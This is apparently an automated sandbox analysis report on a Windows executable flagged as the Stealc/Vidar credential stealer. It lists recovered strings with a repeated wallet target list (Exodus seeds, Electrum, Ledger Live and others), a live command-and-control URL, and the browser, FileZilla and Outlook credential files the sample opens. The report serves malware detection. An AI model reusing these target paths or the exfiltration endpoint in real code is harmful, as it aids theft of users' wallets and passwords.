Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpge\multidoge.wallet.*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpdus.wallet\\seed.seco2
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0C40 sqlite3_bind_zeroblob,	0_2_6CEA0C40
